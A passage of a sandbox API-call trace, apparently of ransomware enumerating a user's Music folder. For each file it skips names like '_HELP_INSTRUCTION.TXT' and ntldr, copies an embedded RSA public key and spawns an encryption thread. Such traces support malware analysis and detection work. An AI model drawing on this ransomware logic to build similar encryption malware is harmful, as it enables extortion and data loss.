9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0117.679] Sleep (dwMilliseconds=0x96) [0117.849] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0117.849] lstrcmpW (lpString1="j3v_bMSa tx-.m4a", lpString2="..") returned 1 [0117.849] lstrcmpW (lpString1="j3v_bMSa tx-.m4a", lpString2=".") returned 1 [0117.849] StrStrW (lpFirst="j3v_bMSa tx-.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0117.849] StrStrW (lpFirst="j3v_bMSa tx-.m4a", lpSrch="ntldr") returned 0x0 [0117.849] StrStrW (lpFirst="j3v_bMSa tx-.m4a", lpSrch="NTLDR") returned 0x0 [0117.849] StrStrW (lpFirst="j3v_bMSa tx-.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0117.849] StrStrW (lpFirst="j3v_bMSa tx-.m4a", lpSrch="ntdetect.com") returned 0x0 [0117.849] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0117.849] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0117.849] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0117.849] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.849] lstrcpyW (in: lpString1=0x17addc, lpString2="j3v_bMSa tx-.m4a" | out: lpString1="j3v_bMSa tx-.m4a") returned="j3v_bMSa tx-.m4a" [0117.849] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.849] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x550 [0117.850] Sleep (dwMilliseconds=0x96) [0118.004] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0118.004] lstrcmpW (lpString1="jtsnNF8Wy Jt.m4a", lpString2="..") returned 1 [0118.004] lstrcmpW (lpString1="jtsnNF8Wy Jt.m4a", lpString2=".") returned 1 [0118.004] StrStrW (lpFirst="jtsnNF8Wy Jt.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0118.004] StrStrW (lpFirst="jtsnNF8Wy Jt.m4a", lpSrch="ntldr") returned 0x0 [0118.004] StrStrW (lpFirst="jtsnNF8Wy Jt.m4a", lpSrch="NTLDR") returned 0x0 [0118.004] StrStrW (lpFirst="jtsnNF8Wy Jt.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0118.004] StrStrW (lpFirst="jtsnNF8Wy Jt.m4a", lpSrch="ntdetect.com") returned 0x0 [0118.004] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0118.004] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0118.004] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0118.004] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.004] lstrcpyW (in: lpString1=0x17addc, lpString2="jtsnNF8Wy Jt.m4a" | out: lpString1="jtsnNF8Wy Jt.m4a") returned="jtsnNF8Wy Jt.m4a" [0118.004] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x554 [0118.004] Sleep (dwMilliseconds=0x96) [0118.160] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0118.160] lstrcmpW (lpString1="LuguQ9Fu8UwQPMQRFj.m4a", lpString2="..") returned 1 [0118.160] lstrcmpW (lpString1="LuguQ9Fu8UwQPMQRFj.m4a", lpString2=".") returned 1 [0118.160] StrStrW (lpFirst="LuguQ9Fu8UwQPMQRFj.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0118.160] StrStrW (lpFirst="LuguQ9Fu8UwQPMQRFj.m4a", lpSrch="ntldr") returned 0x0 [0118.160] StrStrW (lpFirst="LuguQ9Fu8UwQPMQRFj.m4a", lpSrch="NTLDR") returned 0x0 [0118.160] StrStrW (lpFirst="LuguQ9Fu8UwQPMQRFj.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0118.160] StrStrW (lpFirst="LuguQ9Fu8UwQPMQRFj.m4a", lpSrch="ntdetect.com") returned 0x0 [0118.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0118.160] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0118.160] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0118.160] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.160] lstrcpyW (in: lpString1=0x17addc, lpString2="LuguQ9Fu8UwQPMQRFj.m4a" | out: lpString1="LuguQ9Fu8UwQPMQRFj.m4a") returned="LuguQ9Fu8UwQPMQRFj.m4a" [0118.160] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x54c [0118.160] Sleep (dwMilliseconds=0x96) [0118.324] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0118.324] lstrcmpW (lpString1="OPPnhBe-ZTrVhEG421.wav", lpString2="..") returned 1 [0118.324] lstrcmpW (lpString1="OPPnhBe-ZTrVhEG421.wav", lpString2=".") returned 1 [0118.324] StrStrW (lpFirst="OPPnhBe-ZTrVhEG421.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0118.324] StrStrW (lpFirst="OPPnhBe-ZTrVhEG421.wav", lpSrch="ntldr") returned 0x0 [0118.324] StrStrW (lpFirst="OPPnhBe-ZTrVhEG421.wav", lpSrch="NTLDR") returned 0x0 [0118.324] StrStrW (lpFirst="OPPnhBe-ZTrVhEG421.wav", lpSrch="NTDETECT.COM") returned 0x0 [0118.324] StrStrW (lpFirst="OPPnhBe-ZTrVhEG421.wav", lpSrch="ntdetect.com") returned 0x0 [0118.324] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0118.324] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0118.324] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0118.324] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.324] lstrcpyW (in: lpString1=0x17addc, lpString2="OPPnhBe-ZTrVhEG421.wav" | out: lpString1="OPPnhBe-ZTrVhEG421.wav") returned="OPPnhBe-ZTrVhEG421.wav" [0118.324] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.324] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x558 [0118.324] Sleep (dwMilliseconds=0x96) [0118.505] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0118.505] lstrcmpW (lpString1="WWsZT9B6tKUn2DClW.mp3", lpString2="..") returned 1 [0118.505] lstrcmpW (lpString1="WWsZT9B6tKUn2DClW.mp3", lpString2=".") returned 1 [0118.505] StrStrW (lpFirst="WWsZT9B6tKUn2DClW.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0118.505] StrStrW (lpFirst="WWsZT9B6tKUn2DClW.mp3", lpSrch="ntldr") returned 0x0 [0118.505] StrStrW (lpFirst="WWsZT9B6tKUn2DClW.mp3", lpSrch="NTLDR") returned 0x0 [0118.505] StrStrW (lpFirst="WWsZT9B6tKUn2DClW.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0118.505] StrStrW (lpFirst="WWsZT9B6tKUn2DClW.mp3", lpSrch="ntdetect.com") returned 0x0 [0118.505] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0118.505] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0118.505] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0118.505] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.505] lstrcpyW (in: lpString1=0x17addc, lpString2="WWsZT9B6tKUn2DClW.mp3" | out: lpString1="WWsZT9B6tKUn2DClW.mp3") returned="WWsZT9B6tKUn2DClW.mp3" [0118.505] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x560 [0118.506] Sleep (dwMilliseconds=0x96) [0118.667] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0118.667] lstrcmpW (lpString1="xN7YDKwcce9C5peK.mp3", lpString2="..") returned 1 [0118.667] lstrcmpW (lpString1="xN7YDKwcce9C5peK.mp3", lpString2=".") returned 1 [0118.667] StrStrW (lpFirst="xN7YDKwcce9C5peK.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0118.668] StrStrW (lpFirst="xN7YDKwcce9C5peK.mp3", lpSrch="ntldr") returned 0x0 [0118.668] StrStrW (lpFirst="xN7YDKwcce9C5peK.mp3", lpSrch="NTLDR") returned 0x0 [0118.668] StrStrW (lpFirst="xN7YDKwcce9C5peK.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0118.668] StrStrW (lpFirst="xN7YDKwcce9C5peK.mp3", lpSrch="ntdetect.com") returned 0x0 [0118.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0118.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0118.668] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0118.668] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.668] lstrcpyW (in: lpString1=0x17addc, lpString2="xN7YDKwcce9C5peK.mp3" | out: lpString1="xN7YDKwcce9C5peK.mp3") returned="xN7YDKwcce9C5peK.mp3" [0118.668] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x55c [0118.668] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0xffffffff) returned 0x0 [0118.912] Sleep (dwMilliseconds=0x96) [0119.064] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.064] lstrcmpW (lpString1="zCdoEQ.wav", lpString2="..") returned 1 [0119.064] lstrcmpW (lpString1="zCdoEQ.wav", lpString2=".") returned 1 [0119.065] StrStrW (lpFirst="zCdoEQ.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0119.065] StrStrW (lpFirst="zCdoEQ.wav", lpSrch="ntldr") returned 0x0 [0119.065] StrStrW (lpFirst="zCdoEQ.wav", lpSrch="NTLDR") returned 0x0 [0119.065] StrStrW (lpFirst="zCdoEQ.wav", lpSrch="NTDETECT.COM") returned 0x0 [0119.065] StrStrW (lpFirst="zCdoEQ.wav", lpSrch="ntdetect.com") returned 0x0 [0119.065] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0119.065] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0119.065] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0119.065] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.065] lstrcpyW (in: lpString1=0x17addc, lpString2="zCdoEQ.wav" | out: lpString1="zCdoEQ.wav") returned="zCdoEQ.wav" [0119.065] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0119.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x570 [0119.065] Sleep (dwMilliseconds=0x96) [0119.234] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.234] lstrcmpW (lpString1="_iJcWlMQ1CRXwuy.m4a", lpString2="..") returned 1 [0119.234] lstrcmpW (lpString1="_iJcWlMQ1CRXwuy.m4a", lpString2=".") returned 1 [0119.234] StrStrW (lpFirst="_iJcWlMQ1CRXwuy.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0119.234] StrStrW (lpFirst="_iJcWlMQ1CRXwuy.m4a", lpSrch="ntldr") returned 